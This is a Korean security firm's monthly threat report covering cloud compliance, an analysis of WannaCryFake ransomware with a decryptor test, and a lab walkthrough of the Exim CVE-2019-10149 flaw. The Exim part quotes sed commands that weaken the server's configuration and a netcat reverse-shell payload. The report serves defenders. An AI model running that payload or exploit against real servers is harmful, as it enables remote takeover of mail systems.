EQST Insight_201910

Size: px

Start display at page:

Download "EQST Insight_201910"

도경 매
4 years ago
Views:

Threat Intelligence Report INSIGHT 2019 10 EQST(이큐스트)는 Experts,

1 Threat Intelligence Report INSIGHT EQST(이큐스트)는 Experts, Qualified Security Team 이라는 뜻으로 사이버 위협 분석 및 연구 분야에서 검증된 최고 수준의 보안 전문가 그룹입니다.

2 Contents EQST insight Public Cloud 환경의정보보호 Compliance 이슈 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 Research & Technique Exim 원격명령실행취약점 (CVE )

EQST insight Public Cloud 환경의정보보호 Compliance 이슈 최근 Public Cloud 사용이증대됨에따라기존 on-premises 환경에서 Public Cloud 로데이터를이전, 운영함에있어정보보호측면에서의다양한 Compliance가이슈로대두되고있다.

3 EQST insight Public Cloud 환경의정보보호 Compliance 이슈 최근 Public Cloud 사용이증대됨에따라기존 on-premises 환경에서 Public Cloud 로데이터를이전, 운영함에있어정보보호측면에서의다양한 Compliance가이슈로대두되고있다. Public Cloud와관련된주요법률로는 클라우드컴퓨팅발전및이용자보호에관한법률 ( 이하클라우드컴퓨팅법 ), 정보통신망이용촉진및정보보호등에관한법률 ( 이하정보통신망법 ) 및 개인정보보호법 등이있다. 본보고서에서는 Compliance 측면에서이슈가되는사항들을클라우드사업자 (CSP) 와클라우드이용자 (CSU) 측면으로나누어설명하고자한다. EQST insight 1

4 Public Cloud 관련 Compliance 현황 클라우드컴퓨팅법은클라우드컴퓨팅의발전및이용을촉진하고클라우드컴퓨팅서비스를안전하게이용할수있는환경을조성하기위해제정되었다. 주로클라우드사업자가준수해야할사항을명시하고있다. 클라우드컴퓨팅사업자에게본법을적용하되관련규정이없거나충돌하지않는경우에는개별법을우선적용하는것을원칙으로한다. 클라우드컴퓨팅법제정 ( 15 년 3 월 ) 및시행 ( 15 년 9 월 ) - 정보의클라우드육성지원근거마련 - 공공 민간의클라우드이용활성화근거마련 - 안전한클라우드이용환경조성을위한이용자보호근거마련 클라우드컴퓨팅서비스정보보호에관한기준고시 ( 16 년 4 월 ) - 사업자의정보보호수준제고 클라우드보안인증제시행 ( 16 년 5 월 ~) - 클라우드컴퓨팅서비스제공자의서비스가고시기준을준수하는지확인 EQST insight 2

5 Public Cloud 보안책임의이해 클라우드사업자 (CSP) 와서비스이용고객은보안에대한책임을공유하며, on-premises, IaaS(Infra as a Service), PaaS(Platform as a Service), SaaS(Software as a Service) 별책임영역은다음과같다. Responsibility On-perm IaaS PaaS SaaS Data classification & accountability Client & end-point protection Identity & access management The Customer is responsible for security in the Cloud Application level controls Network controls Host infrastructure Physical security Platform provider is responsible for the security of the Cloud Customer Cloud provider [Public Cloud 책임공유모델 1 ] 위와같은보안책임공유모델을바탕으로 Public Cloud 의환경과특성을고려하여클라우드서비스 제공자와이용자의책임영역을세분화할필요가있다. 클라우드서비스계약및 SLA를통해세부적인보안책임을명확히하고, 안전성을보장받을수있다. 클라우드계약체결시에는과학기술정보통신부에서제정한클라우드표준계약서 ( 16년 12월 ) 를참조하여계약서를작성할수있다. 그리고전체서비스관점에서안전성을보장받을수있도록 SLA를체결할수있다. SLA에서비스수준지표에는서비스가용성, 서비스장애, 서비스성능, 데이터관리, 보안관리, 고객지원등을포함할수있다. 1 출처 : Microsoft EQST insight 3

6 Public Cloud 정보보호 Compliance 주요이슈 클라우드컴퓨팅법에는이용자권리, 이용자정보의보호, 이용자정보임치등에대한내용이명시되어있다. Public Cloud 에서발생할수있는주요이슈는클라우드사업자로이전한데이터에개인정보가포함되어있을 경우개인정보처리위탁, 국외이전, 안전성확보조치에대한사항으로상세내용은다음과같다. 1) 개인정보처리위탁 - 관련법률 : 개인정보보호법제26조 ( 업무위탁에따른개인정보의처리제한 ), 정보통신망법제25조 ( 개인정보의처리위탁 ) - 주요이슈 : 클라우드사업자가개인정보수탁자가될경우처리위탁에대한정보주체의동의가필요하며, 개인정보수탁사인클라우드사업자에대한관리 감독및교육을수행하여야한다. ( 이슈설명 ) 클라우드사업자의개인정보처리위탁에대해법원의판결, 규제기관의구체적인사례별적용이나명시적인 법해석은아직나와있지않지만, 법령해설서에서는 개인정보처리위탁 으로설명하고있음. 클라우드컴퓨팅주요법령해설서 클라우드컴퓨팅서비스는저장된개인정보의보관 / 관리등을클라우드서비스제공자가자신의책임하에수탁받아행하게되므로개인정보처리업무의위탁에해당한다는것이다수의해석이므로, 정보통신망법에따라개인정보처리업무를위탁하여야한다. 2) 개인정보국외이전 - 관련법률 : 개인정보보호법제17조 ( 개인정보의제공 ), 정보통신망법제63조 ( 국외이전개인정보의보호 ) - 주요내용 : 클라우드이용자의개인정보를국외에제공 처리 위탁 보관하기위해서는이용자의동의를받고보호조치를취하여야한다. ( 이슈설명 ) 데이터백업, 서비스연속성보장등을위해국내 Region에있는데이터를국외 Region으로이전하는경우에 개인정보국외이전 에해당하여이에따른보호조치를취해야함. 또한정보통신망법에따라개인정보국외제공의경우조회를포함하므로클라우드사업자가해외에서이용자의개인정보를조회하는것을통제하는방안을마련하여야함. EQST insight 4

7 정보통신망법 63 조 ( 개인정보의국외이전 ) 2 정보통신서비스제공자등은이용자의개인정보를국외에제공 ( 조회되는경우를포함한다 ) ㆍ처리위탁ㆍ보관 ( 이하이조에서 이전 이라한다 ) 하려면이용자의동의를받아야한다. 3) 안전성확보조치 - 관련법률 : 개인정보보호법제29조 ( 안전조치의무 ), 정보통신망법제28조 ( 개인정보의보호조치 ) - 주요이슈 : Public Cloud로이전, 운영하는데이터에개인정보가포함될경우, 개인정보보호법및정보통신망법에따른안전성확보조치를취하여야한다. ( 이슈설명 ) Public Cloud 에있는개인정보의안전성을확보하기위해서는클라우드사업자가제공하는솔루션, 3 rd Party 솔루션, 자체적으로보유하고있는솔루션중가장안전하고효과적인방법을선택하여적용해야함. 영역세부영역 CSP 솔루션 ( 예시 ) 접근권한 접근통제 접근권한관리사용자식별비밀번호관리인증정보실패횟수제한네트워크접근통제 AWS : IAM Azure : Azure AD AWS : IAM MFA Azure : Azure AD MFA AWS : NACL/Security Group Azure : Azure Firewall 시스템접속차단기능 AWS : IAM Azure : Azure AD 암호화 로그관리 외부접속시보호조치전송시암호화저장시암호화암호키관리권한관리기록보관접속기록보관및점검 AWS : VPN, Direct Connect Azure : Azure Express Route( 전용망 ) 서비스, S2S VPN, P2S VPN AWS : Certificate Manager, CloudFront, ELB Azure : Azure VPN Gateway, Azure Application Gateway AWS : S3, RDS(TDE 방식 ) 암호화등 Azure : FC(Fabric Controller), FA(Fabric Agent) 등 AWS : KSM, Cloud HSM Azure : Key Vault, HSM AWS : CloudTrail, S3 등 Azure : Azure Log Analytics AWS : CloudTrail, CloudWatch, S3 등 EQST insight 5

8 운영보안 악성프로그램방지취약점점검패치관리이중화백업및복구데이터안전파기 Azure : Azure Log Analytics AWS : 3rd party 또는자체백신 Azure : Azure Security Pack AWS : Inspector, 3rd Party 솔루션 Azure : Azure Security Center AWS : Patch Manager Azure : Azure Automation AWS : EC2, RDS 등이중화 Azure : 다중가상머신구성, Azure Site Recovery 등 AWS : Azure VM Backup 등 Azure : SQL Database Backup 등 AWS : EBS 볼륨삭제, S3 버킷비우기등 Azure : VM 연결, Azure CLI, PowerShell 등 Public Cloud 환경의정보보호 Compliance 주요이슈에대해살펴보았다. on-premises와 Public Cloud 환경에서정보보호 Compliance 기준자체는다르지않으나, 이를구현하고적용하는방법에는차이가있을수있음으로 Public Cloud에대한명확한이해와분석이필요하다. 또한 Compliance는최소한의보안기준임을명심하여단순히 Compliance 준수에만족하지않고, Public Cloud 환경에서보안수준을향상시킬수있도록클라우드사업자및클라우드이용자가공동으로노력해야할것이다. EQST insight 6

Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다.

9 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인 PC, 기업업무 PC 등의주요파일을사용할수없도록암호화하기때문에감염시매우치명적이다. PC, 네트워크를이용하여감염및전파되기때문에동시다발적피해를유발할수있어파급력또한크다. 최근에는모바일및다수 IoT 기기까지그피해범위가확장되고있다. 일부랜섬웨어의경우국내외보안업체및연구원들에의해복호화도구가개발되어무료로공개되기도하므로감염피해발생시이를활용하여조치하는것도좋은방법이다. EQST insight 7

10 최근동향 과거랜섬웨어공격이불특정다수를노리던것과달리최근에는표적형, 즉기업을노리는랜섬웨어들이 증가하는추세이다. 랜섬웨어 정보유출 ( 기기정보 ) 13.8% 6.9% 다운로더 14.5% 가상통화채굴 4.1% DDoS 2.8% 키로깅 1.4% 런처 0.7% 정보유출 ( 금융정보 ) 0.7% 백도어 0.7% 드롭퍼 0.7% 기타 0.7% 정보유출 ( 계정정보 ) 22.1% 원격제어 31.0% [ 악성코드유형별비율 2 ] 전체악성코드비율중랜섬웨어는 13.8% 의비율을차지하고있다. 원격제어나다운로더와같은 해킹수단 을제외하면정보유출, 가상통화채굴과같은 해킹목적 관점에서는정보유출에이어두번째로큰수치이다. 쉽게말해해킹의주된목적중하나라고할수있다. 2019년 2분기평균몸값지급액은 2019년 1분기 12,762달러에서 36,295달러로 184% 증가했다. 도표의빨간선은복구비용, 파란선은가용성을지키지못하는기간 ( 중단시간 ) 에따른손실비용을나타낸다. 2 출처 : KISA EQST insight 8

11 $100, $75, $50, $25, $0.00 3/1/2019 4/1/2019 5/1/2019 6/1/2019 [2019 년 2 분기동안매일지급된랜섬웨어관련피해금액 3 ] 일반적으로랜섬웨어의몸값측정은그대상의자본수준과직접적인연관이있다. 요구하는몸값에비해적은자본을가진피해자는복구시도자체를포기하기때문이다. 따라서평균몸값지급액의증가는랜섬웨어의공격대상이기업위주로선정되고있는것으로해석된다. 그렇다면실제로는어떠한사례가존재할까? 다음은 KISA에서 2019년에공개한랜섬웨어사례들이다. - WebLogic Server 취약점 (CVE ) 을악용하여원격랜섬웨어 (sodinokibi) 실행 - 중앙관리서버 (AD 서버 ) 에침투하여관리서버에연결된시스템에랜섬웨어 (Clop) 를삽입 [ 랜섬웨어피해사례 ] WebLogic 취약점공격의경우 WebLogic Port들에대한스캐닝을통해취약점이존재하는서버를찾는다. 이는불특정다수에대한공격으로도보일수있으나 WebLogic 은기업이주로이용하는미들웨어이다. 두번째사례는진정한표적형랜섬웨어라고볼수있다. 개인보다상대적으로가치가큰데이터들을가지고있는기업에서큰몸값을얻어내기위하여공격자는스피어피싱을통한내부망접근및주요관리서버탈취후랜섬웨어를삽입했다. 기업에대한랜섬웨어공격은기업이백업을잘수행하여복구가가능하다고하더라도복구기간동안서비스제공에차질을줄수있다. 때문에서비스가용성이중요한기업에서는돈을주고서라도빠르게복구하려는경향이있다. 따라서해커들은이런점을약점으로여겨향후에도기업을표적으로하는랜섬웨어공격을더욱빈번히시도할것으로보인다. 3 출처 : EQST insight 9

12 Paradise CryptoMix 1.1% 1.1% Sodinokibi Dharma 12.5% 13.6% Mr.Dec 2.3% GandCrab 10.2% Phobos 17.0% IEncrypt 3.4% Globelmposter % Rapid 3.4% Matrix 1.1% Ryuk 23.9% [2019 년 2 분기랜섬웨어유형 ] 위통계처럼랜섬웨어는매우다양하게분류된다. 이번보고서에서다루는 WannaCryFake 랜섬웨어는 Phobos 랜섬웨어의변종으로마치 WannaCry 랜섬웨어인것처럼위장하는특징을가지고있다. Phobos 랜섬웨어는위와같이가장널리퍼진랜섬웨어유형중하나다. EQST insight 10

13 감염시나리오 Victim s PC Hacker HTML Malicious webpage 4 5 Browser 취약점 유발 악성파일 Internet! Browser 다운로드 요청 C&C Server 1 Exploit Kit으로악성 Script 삽입 EXE 6 Malware 악성파일 WWW. 3 다운로드 Ad 7 백신 강제 종료악성페이지로 Advertise Banner Redirect Victim 2 8 $ 광고페이지 접근 Vaccine 설치 Ransomware [ 피해시나리오 ( 불특정다수 )] 1 Exploit Kit 을통해정상웹페이지에있는광고배너에악성 Script를삽입한다. - Exploit Kit : 특정취약점에대한공격을자동화한도구 2 피해자는악성광고배너가존재하는페이지에접근한다. 3 피해자는광고배너에존재하는악성 Script에의해악성웹페이지로 Redirect 된다. - Redirect : URL 요청을다른 URL로넘겨주는행위 4 악성페이지에존재하는 피해자 Browser 의취약점을유발하는코드 를실행한다. 5 취약점에의해 C2 서버로부터의악성파일다운로드를요청하게된다. 6 C2 서버로부터악성파일다운로드후실행한다. 7 랜섬웨어설치를막는백신들을종료시킨다. 8 랜섬웨어를설치후동작시킨다. EQST insight 11

14 VDI Network Hacker 1 피싱메일 송신 VDI PC 실행 EXE SMB VDI PC Pool 생성스캐닝 $ 악성 Ammyy 8 랜섬웨어 배포매크로문서 RAT 5 침투 7 Cobalt Strike AD Server 실행 C&C Remote 6 Reverse Connection [ 피해시나리오 ( 표적형 )] 1 표적을속일만한피싱메일을송신한다. 2 피해자는 VDI PC에서피싱메일에포함된 악성매크로가포함된문서 를실행한다. 3 악성매크로에의해 Ammyy RAT 가생성되고, 해커는해당시스템의제어권을가지게된다. - Ammyy RAT : 원격에서해당시스템을관리자처럼이용하게해주는악성도구중하나 4 SMB 스캐닝을통해네트워크망을파악한다. - SMB : 윈도 OS에서파일이나디렉터리및주변장치들을공유하는데사용되는프로토콜 ( 메시지규약 ) 5 AD 서버를발견한뒤취약점또는무차별대입공격을통해서버를장악한다. - AD 서버 : 도메인 ( 관리자가설정한그룹 ) 에연결된시스템들의인증과디렉터리서비스등을관리하는서버 6 AD 서버에서해커와 Reverse Connection 을맺는다. 7 Cobalt Strike 를이용하여도메인계정탈취등의랜섬웨어배포를위한준비를한다. - Cobalt Strike : 시스템침투테스터를위한다양한기능을가진도구 8 AD서버를이용하여랜섬웨어를네트워크망에배포한다. EQST insight 12

15 복호화도구소개 랜섬웨어의종류가증가함에따라복호화도구도다양하게공개되어있다. 우선복호화도구를사용하기위해서는감염된랜섬웨어의종류와버전확인이필수적이다. Malwarehunterteam 페이지를이용하면감염랜섬웨어의종류및정보의확인이가능하다. (URL : [ 감염랜섬웨어확인 ] EQST insight 13

16 한국랜섬웨어침해대응센터 에는국내외보안업체에서공개한복호화도구가소개되어있다.) (URL : ) 등록일 제목 Gandcrab v1, v4, v5.2 Decryptor Gandcrab v1, v4, v5.0.3 Decryptor Avast_Decryptor_CrySiS Decryptor TeslaCrypt Decryptor Xorist Decryptor Shade Decryptor Scatter Decryptor WildFire Decryptor Rannoh Decryptor Rakhni Decryptor crypto Decryptor CryptXXX3.0 Decryptor TeslaCrypt Decryptor CryptXXX2.0(.crypt) Decryptor CryptXXX(.crypt) Decryptor Crypted Decryptor TeslaCrypt2.2(.ccc,.vvv) Decryptor(Bitcoin) TeslaCrypt2.2(.ccc,.vvv) Decryptor(AES key) EQST insight 14

그외국내기관중에는한국인터넷진흥원 (KISA) krcert 사이트에랜섬웨어복호화도구가소개되어있으며, 해외사이트로는노모어랜섬 (no more ransom) 에복호화도구가한국어로정리되어있다. - krcert : http://www.krcert.or.kr/ransomware/recovery.do - 노모어랜섬 : http://www.nomoreransom.

17 그외국내기관중에는한국인터넷진흥원 (KISA) krcert 사이트에랜섬웨어복호화도구가소개되어있으며, 해외사이트로는노모어랜섬 (no more ransom) 에복호화도구가한국어로정리되어있다. - krcert : - 노모어랜섬 : 최근에는 WannaCryFake 랜섬웨어의복호화도구가공개되었다. 하지만개발회사에서는공개된복호화도구가해당랜섬웨어에대응하여모든파일을복구할수있다는보증을하진않는다. 그리고복호화과정에서오류가발생할시해당파일에대해선영원히복구가불가능하다. 이에본리포트에서는복호화도구의검증을위해복원성공률등을테스트하였다. 감염증상 보통의랜섬웨어와같이 WannaCryFake 랜섬웨어도랜섬노트, 확장자를통해쉽게감염여부를확인할수 있다. 실행시암호화를진행하며암호화여부와관계없이대부분의파일확장자를 WannaCry 로변경한다. [ 확장자변경 ] EQST insight 15

Net FrameWork 4 버전이상의실행환경을요구하는 C# 프로그래밍언어로 작성된악성코드이다.

18 암호화동작및파일확장자변경작업을완료하면, Info.hta 라는이름의랜섬노트파일을생성한다. 생성된 파일은사용자가감염사실을인지할수있도록윈도우창형태로출력된다. [ 랜섬노트 ] 소스코드분석 WannaCryFake 랜섬웨어는.Net FrameWork 4 버전이상의실행환경을요구하는 C# 프로그래밍언어로 작성된악성코드이다. 악성코드파일속성은 Windows Defender 처럼보이도록설정되어있는것으로 확인된다. [ 파일정보 ] 실행시드라이브, 공유폴더등시스템정보를확인하여암호화할대상을특정한다. 이때암호화에필요한 확장자및암호화에필요한키를설정한다. 암호화키는내부의고정된특정데이터를이용해 SHA-256 해시 EQST insight 16

19 알고리즘을사용하여생성한다. 설정이완료되면사용자의파일에대하여암호화진행및파일의확장자를 변경한다. [ 키생성 ] 생성한키를이용하여암호화및파일의확장자를변경한다. [ 암호화및확장자변경 ] [ 파일암호화코드 ] EQST insight 17

20 암호화대상파일확장자는총 650 개로다음과같다. 해당확장자를제외한파일의경우파일명만변경되고 암호화는진행되지않는다. 실행파일역시암호화대상에서제외된다. 그러나확장자변경으로인해 정상적으로실행되지않아시스템구동에문제가발생할가능성도있다..csv.efx.sdf.vcf.xml.ses.rar.zip.7zip.jpg.jpeg.raw.tif.gif.png.bmp.3dm.max.accdb.db.dbf.mdb.pdb.s ql.dwg.dxf.c.cpp.cs.h.php.asp.rb.java.jar.class.py.js.aaf.aep.aepx. plb.prel.prproj.aet.ppj.psd.indd.indl.indt.indb.inx.idml.pmd.xqx.xqx.ai.eps.ps.svg.swf.fla.as3.as.txt. doc.dot.docx.docm.dotx.dotm.docb.rtf.wpd.wps.msg.pdf.xls.xlt.xlm.xlsx.xlsm.xltx.xltm.xlsb.xla.xla m.xll.xlw.ppt.pot.pps.pptx.pptm.potx.potm.ppam.ppsx.ppsm.sldx.sldm.wav.mp3.aif.iff.m3u.m4u. mid.mpa.wma.ra.avi.mov.mp4.3gp.mpeg.3g2.asf.asx.flv.mpg.wmv.vob.m3u8.mkv.1cd.3dm.3ds.3 fr.3g2.3gp.3pr.7z.7zip.aac.aaf.ab4.accdb.accde.accdr.accdt.ach.acr.act.adb.adp.ads.aep.aepx.aes. aet.agdl.ai.aif.aiff.ait.al.amr.aoi.apj.apk.arch00.arw.as.as3.asf.asm.asp.aspx.asset.asx.atr.avi.awg.b ack.backup.backupdb.bak.bar.bay.bc6.bc7.bdb.bgt.big.bik.bin.bkf.bkp.blend.blob.bmd.bmp.bpw.b sa.c.cas.cdc.cdf.cdr.cdr3.cdr4.cdr5.cdr6.cdrw.cdx.ce1.ce2.cer.cfg.cfr.cgm.cib.class.cls.cmt.config.c ontact.cpi.cpp.cr2.craw.crt.crw.cs.csh.csl.css.csv.d3dbsp.dac.dar.das.dat.dazip.db.db0.db3.dba.dbf.dbx.db_journal.dc2.dcr.dcs.ddd.ddoc.ddrw.dds.der.des.desc.design.dgc.dir.dit.djvu.dmp.dng.doc.d ocb.docm.docx.dot.dotm.dotx.drf.drw.dtd.dwg.dxb.dxf.dxg.easm.edb.efx.eml.epk.eps.erbsql.erf.e sm.exf.fdb.ff.ffd.fff.fh.fhd.fla.flac.flf.flv.flvv.forge.fos.fpk.fpx.fsh.fxg.gdb.gdoc.gho.gif.gmap.gray. grey.groups.gry.gsheet.h.hbk.hdd.hkdb.hkx.hplg.hpp.htm.html.hvpl.ibank.ibd.ibz.icxs.idml.idx.iff.iif.iiq.incpas.indb.indd.indl.indt.inx.itdb.itl.itm.iwd.iwi.jar.java.jnt.jpe.jpeg.jpg.js.kc2.kdb.kdbx.kdc.key.kf.kpdx.kwm.laccdb.layout.lbf.lck.ldf.lit.litemod.log.lrf.ltx.lua.lvl.m.m2.m2ts.m3u.m3u8.m4a.m4p. m4u.m4v.map.max.mbx.mcmeta.md.mdb.mdbackup.mdc.mddata.mdf.mdi.mef.menu.mfw.mid.m kv.mlb.mlx.mmw.mny.mos.mov.mp3.mp4.mpa.mpeg.mpg.mpp.mpqge.mrw.mrwref.msg.myd.nc. ncf.nd.ndd.ndf.nef.nk2.nop.nrw.ns2.ns3.ns4.nsd.nsf.nsg.nsh.ntl.nvram.nwb.nx2.nxl.nyf.oab.obj.o db.odc.odf.odg.odm.odp.ods.odt.ogg.oil.orf.ost.otg.oth.otp.ots.ott.p12.p7b.p7c.pab.pages.pak.p as.pat.pcd.pct.pdb.pdd.pdf.pef.pem.pfx.php.pif.pkpass.pl.plb.plc.plt.plus_muhd.pmd.png.po.pot.p otm.potx.ppam.ppj.ppk.pps.ppsm.ppsx.ppt.pptm.pptx.prel.prf.prproj.ps.psafe3.psd.psk.pst.ptx.pw m.py.qba.qbb.qbm.qbr.qbw.qbx.qby.qcow.qcow2.qdf.qed.qic.r3d.ra.raf.rar.rat.raw.rb.rdb.re4.rgs s3a.rim.rm.rofl.rtf.rvt.rw2.rwl.rwz.s3db.safe.sas7bdat.sav.save.say.sb.sd0.sda.sdf.ses.shx.sid.sidd.si dn.sie.sis.sldasm.sldblk.sldm.sldprt.sldx.slm.snx.sql.sqlite.sqlite3.sqlitedb.sr2.srf.srt.srw.st4.st5.st6.st7.st8.stc.std.sti.stl.stm.stw.stx.sum.svg.swf.sxc.sxd.sxg.sxi.sxm.sxw.syncdb.t12.t13.tap.tax.tex.tga.th m.tif.tlg.tor.txt.upk.v3d.vbox.vcf.vdf.vdi.vfs0.vhd.vhdx.vmdk.vmsd.vmx.vmxf.vob.vpk.vpp_pc.vtf.w 3x.wab.wad.wallet.wav.wb2.wma.wmo.wmv.wotreplay.wpd.wps.x11.x3f.xf.xis.xla.xlam.xlk.xll.xlm.xlr.xls.xlsb.xlsb3dm.xlsm.xlsx.xlt.xltm.xltx.xlw.xml.xqx.xxx.ycbcra.yuv.zip.ztmp [ 대상확장자 ] EQST insight 18

21 악성코드내부자원에는랜섬노트를작성하기위한코드가삽입되어있으며 HTML Applications(HTA) 형식으로제작되어사용자에게노출되도록한다. 랜섬노트내에는파일의암호화와비트코인의지급에대한내용이있으며특정이메일로연락하라는설명이있다. 직접이메일을보내고공격자와 XMPP을이용해대화하는방법을안내한다. - XMPP : XML 기반인터넷통신을위한오픈프로토콜 [ 랜섬노트생성 ] EQST insight 19

도구의사용법도간단하게 PDF 형식으로제공하고있다. (URL : https://www.

com/ransomware-decryption-tools/wannacryfake)

22 복호화도구검증 랜섬노트와확장자로보아 WannaCryFake 랜섬웨어로확인되면복호화도구를이용하여복구를진행할수있다. 해당도구는 NoMoreRansom 프로젝트를지원하는 Emsisoft에서제공하며아래의링크를통해다운로드할수있다. 도구의사용법도간단하게 PDF 형식으로제공하고있다. (URL : [ 복호화도구사용방법 ] 해당도구를사용하면아래와같이암호화된파일에대하여복호화를진행할수있다. 도구를테스트하기 위해일반적으로사용되는문서, 인증서, 압축파일등 28 개확장자에대하여복호화를진행하였으며암호화된 모든파일이복호화가되는것이확인되었다. EQST insight 20

23 - 테스트확장자 txt xml java jar der cer dat png bmp jpg gif pdf pptx docx xlsx zip tar 7z iso html htm key py pyc wmv avi mp4 sql [ 복호화성공파일 ] 그리고복호화진행중일부파일에서 패딩오류, 데이터오류 2 가지형태로 Error 메시지가출력되는경우 가발생한다. [Error 메시지 ] EQST insight 21

24 실제해당파일을확인해보면복호화를진행하지못한것이아니라, 암호화가진행되지않고파일명및 확장자만변경된정상파일이기때문에오류가발생한것으로확인된다. [ 정상파일확인 - MZ] 실제암호화가되지않더라도확장자변경으로인해시스템에문제가발생할수있으므로주의가요구된다. [ 이름만변경된파일 ] EQST insight 22

25 감염조치 랜섬웨어이름, 버전, 파일확장자확인후, 감염된랜섬웨어에대한복호화도구를이용하여복호화시도. 도구이용시원본파일백업후사용권고. 복호화도구가없더라도추후배포될수있으므로감염파일별도보관권고 해커에게복구비용을지급해도해독키를수신하지못할수있음 시스템복원기능활용또는초기화 예방수칙 Windows 업데이트최신버전유지 백신프로그램설치후업데이트최신버전유지 백신프로그램실시간감시기능활성화 중요도가높은파일은별도외부저장장치에따로저장하고주기적으로백업 필요한프로그램은관련공식사이트에서만다운로드 안전하지않은사이트접속및파일다운로드이용지양 검증되지않은파일에대한다운로드및실행시, 백신점검후사용 검증되지않은이메일에포함된하이퍼링크및첨부된실행파일, 스크립트파일, 문서파일등의의심 파일실행금지 문서편집기 (Word, Excel, HWP 등 ) 의매크로기능미사용으로설정 Flash player, Adobe Reader 최신버전유지 탐색기옵션보안설정강화폴더옵션 > 보기 > 고급설정 > 알려진파일형식의파일확장자숨기기비활성화 ( 이중확장자악성코드식별 ) EQST insight 23

Research & Technique Exim 원격명령실행취약점 (CVE-2019-10149) 취약점개요 Exim은인터넷에연결된 Unix 시스템을위해개발된메시지전송에이전트 (MTA : Message Transfer Agent) 이다. 메시지전송에이전트는메일서버로메시지를보내거나, 메일서버간에메일을송수신하는역할을한다.

26 Research & Technique Exim 원격명령실행취약점 (CVE ) 취약점개요 Exim은인터넷에연결된 Unix 시스템을위해개발된메시지전송에이전트 (MTA : Message Transfer Agent) 이다. 메시지전송에이전트는메일서버로메시지를보내거나, 메일서버간에메일을송수신하는역할을한다. 이와같은 Exim 메일서비스에서명령어를실행할수있는원격명령실행취약점이발견됐다. 수신자주소에대한검증이미흡하여삽입된명령어가 Exim 서버에서실행된것이다. 해당취약점은로컬공격자가즉시악용가능하며, root 권한으로명령을실행할수있다. 특정구성이적용된 Exim 서버의경우원격공격또한가능하다. 해당취약점발견자는 Exim 의최신변경사항을코드검토중발견했으며, 당시신규버전 (4.92) 은조치되어배포된상태임을확인했다. 영향받는소프트웨어버전과대응방안은다음과같으며, 본보고서를통해 Exim 원격명령실행 취약점 (CVE ) 을상세분석하고공격시나리오에대해살펴보고자한다. EQST insight 24

27 영향받는소프트웨어버전 S/W 구분 Exim 취약버전 4.87 ~ 4.91 버전 대응방안 Exim 원격명령실행취약점 (CVE ) 해결을위한패치버전은 4.92 이나, Linux OS 별제조사에서 제공하는패치버전은상이할수있다. 단, CVE 취약점이후 Exim 취약점이추가로보고되어 관련사항을참고할것을권고한다. 19 년도발견된 Exim 취약점취약버전패치버전 CVE ~ (Linux OS 별제조사제공패치버전은 상이할수있음 ) CVE ~ CVE ~ CVE ~ Exim 공식홈페이지를참고하여최신버전정보와다운로드정보를확인할수있다. [Exim 공식홈페이지공지확인 ] EQST insight 25

[Exim 공식홈페이지다운로드링크 ] 공격시나리오 공격자가 CVE-2019-10149 취약점을이용하여취약한대상의 PC 제어권을탈취하고중요정보를획득하는 시나리오는다음과같다.

28 [Exim 공식홈페이지다운로드링크 ] 공격시나리오 공격자가 CVE 취약점을이용하여취약한대상의 PC 제어권을탈취하고중요정보를획득하는 시나리오는다음과같다. Exim(MTA) Mail Server 1 대상탐색 CVE 관리자 쉘 (PC 제어권 탈취 ) 3 데이터베이스 공격자 [ 공격시나리오 ] 1 공격자는메일서버가취약한버전의 Exim 을사용하는것을확인함 2 공격자는메일전송시악의적인명령을전달하여 RCE 을시도함 3 공격을통해피해자 PC 의제어권을탈취하고, 중요정보를획득함 EQST insight 26

29 테스트환경구성정보 역할구분 공격자 피해자 정보 Kali Linux 64bit Ubuntu 64bit / Exim(4.89) 취약점테스트 Step 1. 취약점테스트환경구축 Exim 설치후초기설정값을유지할경우, 원격공격이가능하나시나리오상공격자가취약한서버에 7일이상접속을유지 ( 해당조건은무시되도록설정 ) 해야한다. 또한원격으로악용하기쉬운구성설정이일부필요하며아래와같다. - 관리자가 verify =recipient ACL( 접근제어리스트 ) 을제거한경우 - 수신자주소의로컬부분에서태그를인식하도록구성된경우예 ) 'local_part_suffix = + * : - *' 주석을제거 - Exim이보조 MX (Mail exchange) 로원격도메인주소에메일을전달하게설정된경우 위내용을참고하여원격으로공격을원활히진행하기위해 Exim 설치후기본구성을아래와같은방식으로 7 일이상접속없이공격가능하도록릴레이허용 ( 테스트목적 ) sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = */' /usr/exim/configure sed -i '/hostlist relay_from_hosts = localhost/c\hostlist relay_from_hosts = ' 관리자가 "verify = recipient" ACL( 접근제어리스트 ) 을수동으로제거 sed -i '/require verify = recipient/c\#require verify = recipient' /usr/exim/configure [Python 스크립트 (poc.py)] EQST insight 27

Step 2. PoC 테스트 공개된 PoC를이용해공격을수행했다. 스크립트는피해자 PC에 TCP 연결을수행한뒤, 지정된방식에따라메일을전송한다. 이때수신자정보데이터를명령어구문으로설정한다. PoC 테스트를위해쉘스크립트파일 (exploit.sh) 중피해자 PC에서실행시킬명령어 (PAYLOAD) 와공격대상 (HOST) 값을테스트조건과환경에맞게수정해서사용하였다.

30 Step 2. PoC 테스트 공개된 PoC를이용해공격을수행했다. 스크립트는피해자 PC에 TCP 연결을수행한뒤, 지정된방식에따라메일을전송한다. 이때수신자정보데이터를명령어구문으로설정한다. PoC 테스트를위해쉘스크립트파일 (exploit.sh) 중피해자 PC에서실행시킬명령어 (PAYLOAD) 와공격대상 (HOST) 값을테스트조건과환경에맞게수정해서사용하였다. [ 쉘스크립트 (exploit.sh) 4 ] PoC 테스트에서사용할명령어 (PAYLOAD) 는리버스쉘을수행하며, 다음과같다. ( 공격자 IP : , netcat OPEN 포트번호 : 10149) mkfifo /tmp/test; nc </tmp/test /bin/sh >/tmp/test 2>&1; rm /tmp/test 4 PoC 출처 : EQST insight 28

